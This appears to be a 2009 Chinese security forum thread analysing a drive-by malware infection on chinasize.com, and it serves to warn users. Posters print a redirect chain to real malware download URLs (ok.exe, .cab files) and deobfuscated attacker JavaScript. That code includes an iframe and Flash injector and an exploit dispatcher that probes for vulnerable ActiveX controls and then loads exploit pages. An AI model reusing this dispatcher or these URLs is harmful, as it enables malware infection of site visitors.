hxxp://www.chinasize.com[挂马][已确认by aarwwefdds]

显示全部楼层 · 发表于 2009-3-1 11:29:50

http://www.chinasize.com/
一进这个网站瑞星就不停的报

显示全部楼层 · 发表于 2009-3-1 11:39:06

应该没有错了

显示全部楼层 · 发表于 2009-3-1 12:02:27

最近这个挂马很常见....

而且很麻烦....
我的神啊....

显示全部楼层 · 发表于 2009-3-1 12:09:27

VT
http://www.virustotal.com/analis ... 0e0a0480248bcca0528

TO DW

Avast . GData .VirusBuster

[ 本帖最后由黑衣~魂于 2009-3-1 12:10 编辑 ]

显示全部楼层 · 发表于 2009-3-1 12:11:52

Log is generated by FreShow.
[wide]http://www.chinasize.com/
[script]http://www.chinasize.com/web/NewsJs/NewsJs.aspx?GetName=nsize081226-huodong
      [script]http://3b3.org/c.js
         [frame]http://3b3.org/http:\/\/w.dw324.cn\/01\/index.htm
            [frame]http://w.dw324.cn/01/logo.htm
            [script]http://js.tongji.cn.yahoo.com/960115/ystat.js
http://w.dw324.cn/01/logo.htm解密后
<script language=javascript>fB54=6782;if(document.all){function _dm(){return false};function _mdm(){document.oncontextmenu=_dm;setTimeout("_mdm()",800)};_mdm();}document.oncontextmenu=new Function("return false");function _ndm(e){if(document.layers||window.sidebar){if(e.which!=1)return false;}};if(document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_ndm;}else{document.onmouseup=_ndm;};vT22=4493;kR87=8495;function _dws(){window.status = " ";setTimeout("_dws()",100);};_dws();sH1=7922;rZ57=5354;function _dds(){if(document.all){document.onselectstart=function (){return false};setTimeout("_dds()",700)}};_dds();pM17=6497;rQ29=1638;iA34=4496;uG81=5636;tT41=6779;iR6=780;zC11=3639;;_licensed_to_="huyufeng";</script>
下面有进入all.htm过程进挂马原始地址

[ 本帖最后由 lichun005 于 2009-3-1 12:18 编辑 ]

显示全部楼层 · 发表于 2009-3-1 12:15:07

"+"+"+"+"+"+"+"

<SCRIPT LANGUAGE="javascript">

window.onerror=function(){return true;}

function init(){document.write();}

window.onload = init;

if(document.cookie.indexOf("wudixiaozi=")==-1)

{

var kbks="kbstg";

var skpaopao=new Date();

var expires=new Date();

expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie="wudixiaozi=Yes;path=/;expires="+expires.toGMTString();

if(navigator.userAgent.toLowerCase().indexOf("msie")>0)

{

document.write('<object classid="clsid:d27cdb"+"6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');

document.write('<param name="allowScriptAccess" value="sameDomain"/>');

document.write('<param name="movie" value="ie.swf"/>');

document.write('<param name="quality" value="high"/>');

document.write('<param name="bgcolor" value="#ffffff"/>');

document.write('<embed src="ie.swf"/>');

document.write('</object>');

}

else

{

document.write("<EMBED src=ff.swf width=0 height=0>");

}

document.writeln("<iframe src=all.htm width=100 height=0><\/iframe>");}

</SCRIPT>

</BODY></HTML>
不好意思，原来下面还有
应该是个swf马

显示全部楼层 · 发表于 2009-3-1 12:15:36

关于:hxxp://www.chinasize.com/解密的日志(全体输出-  42):

Level  0>http://www.chinasize.com/
Level  1>http://www.chinasize.com/web/newsjs/newsjs.aspx?getname=nsize081226-huodong
Level  2>http://3b3.org/c.js
Level  3>http://w.dw324.cn/01/index.htm
Level  4>http://w.dw324.cn/01/logo.htm
Level  5>http://w.dw324.cn/01/all.htm
Level  6>http://w.dw324.cn/01/5.htm
Level  7>http://w.dw324.cn/01/c.js
Level  8>http://w.ut99889.com/01/ok.exe  ●
Level  6>http://w.dw324.cn/01/0.htm
Level  7>http://w.ut99889.com/01/ok1.exe  ●
Level  6>http://w.dw324.cn/01/4.htm
Level  7>http://w.ut99889.com/01/ok.exe  ●
Level  6>http://w.dw324.cn/01/3.htm
Level  7>http://w.ut99889.com/01/ok.exe  ●
Level  6>http://w.dw324.cn/01/2.htm
Level  7>http://w.ut99889.com/01/ok.exe  ●
Level  6>http://w.dw324.cn/01/uu.htm
Level  7>http://w.dw324.cn/01/uu.txt
Level  8>http://w.wesy67.com/01/uusee.cab  ●
Level  6>http://w.dw324.cn/01/cx.htm
Level  7>http://w.ut99889.com/01/ok.exe  ●
Level  6>http://w.dw324.cn/01/bf.htm
Level  7>http://w.ut99889.com/01/ok.exe  ●
Level  6>http://w.dw324.cn/01/office.htm
Level  7>http://w.ut99889.com/01/ok.exe  ●
Level  6>http://w.dw324.cn/01/s.htm
Level  7>http://w.ut99889.com/01/ok.exe  ●
Level  6>http://w.dw324.cn/01/newlz.htm
Level  7>http://w.ut99889.com/01/ok.exe  ●
Level  6>http://w.dw324.cn/01/6.htm
Level  7>http://w.wesy67.com/01/ok.exe  ●
Level  6>http://w.dw324.cn/01/b.htm
Level  7>http://w.wesy67.com/01/baidu.cab  ●
Level  6>http://w.dw324.cn/01/1.htm
Level  7>http://w.ut99889.com/01/ok.exe  ●
Level  5>http://w.dw324.cn/01/ie.swf  ●
Level  6>http://w.dw324.cn/01/win%209,0,115,0i.swf
Level  7>http://w.ut99889.com/01/ok.exe  ●
Level  6>http://w.dw324.cn/01/ff.swf  ●
Level  7>http://w.dw324.cn/01/win%209,0,115,0i.swf  ●
Level  8>http://w.ut99889.com/01/ok.exe  ●

Log by aarwwefdds(打点的均为真实木马地址)
我的神啊.....

显示全部楼层 · 发表于 2009-3-1 12:17:03

.............

<script>

window.status="完成";

window.onerror=function(){return true;}

if(document.cookie.indexOf("iloveyou=")==-1)

{

var expires=new Date();

expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie="iloveyou=Yes;path=/;expires="+expires.toGMTString();

if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)

document.write("<iframe width=20 height=0 src=1.htm></iframe>");

document.write("<iframe width=20 height=0 src=b.htm></iframe>");

document.write("<iframe width=20 height=0 src=6.htm></iframe>");

try{var f;

var gw=new ActiveXObject("GLIEDown.IEDown.1");}

catch(f){};

finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=newlz.htm></iframe>");}}

try{var m;

var hw=new ActiveXObject("Downlo"+"ader.DL"+"oader.1");}

catch(m){};

finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=s.htm></iframe>");}}

try{var n;

var hl=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}

catch(n){};

finally{if(n!="[object Error]"){document.write("<iframe width=100 height=0 src=office.htm></iframe>");}}

try{var b;

var hh=new ActiveXObject("MP"+"S.S"+"tor"+"mPl"+"ayer");}

catch(b){};

finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=bf.htm></iframe>");}}

try{var o;

var mm=new ActiveXObject("Pdg2");}

catch(o){};

finally{if(o!="[object Error]"){document.write("<iframe width=100 height=0 src=cx.htm></iframe>");}}

try{var k;

var storm=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1")}

catch(k){};

finally{if(k!="[object Error]"){document.write("<iframe width=100 height=0 src=uu.htm></iframe>");}}

try{var ffffffff;

var ourgame=new ActiveXObject("\x48\x61\x6e\x47"+"\x61\x6d\x65"+"\x50\x6c\x75"+"\x67\x69\x6e"+"\x43\x6e\x31\x38\x2e"+"\x48\x61\x6e\x47\x61\x6d\x65\x50\x6c\x75\x67\x69\x6e\x43\x6e\x31\x38\x2e\x31");}

catch(ffffffff){};

finally{if(ffffffff!="[object Error]")

{document.write("<iframe width=0 height=0 src=2.htm></iframe>");}}

function caocaoks()

{

rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";

try

{

Like = new ActiveXObject(rrooxx);

}catch(error){return;}

vvvvv = Like.PlayerProperty("PRODUCTVERSION");

if(vvvvv<="6.0.14.552")

document.write("<iframe width=100 height=1 src=3.htm></iframe>");

else

document.write("<iframe width=100 height=1 src=4.htm></iframe>");

}

caocaoks();

document.write("<iframe width=20 height=0 src=0.htm></iframe>");

if(navigator.userAgent.toLowerCase().indexOf("msie 7")!=-1)

document.write("<iframe src=5.htm width=100 height=0></iframe>");

}

</script>
上面说错了，处了swf，接着进all.htm得到最后代码

显示全部楼层 · 发表于 2009-3-1 12:17:47

这个...

你可以无视

用Malzilla会看到这一段

其实这个CryptHTML由两部分组成

上面那段是第一部分，没有第一部分就无法解出第二部分....

但是解密出来了，第一部分就没用了..

显示全部楼层 · 发表于 2009-3-1 12:19:07

不好意思，解密后代码过长，没看完，原来挂马地址在后面，8楼应该是最后挂马地址了

hxxp://www.chinasize.com[挂马][已确认by aarwwefdds]

回复 5楼 lichun005 的帖子

回复 9楼 aarwwefdds 的帖子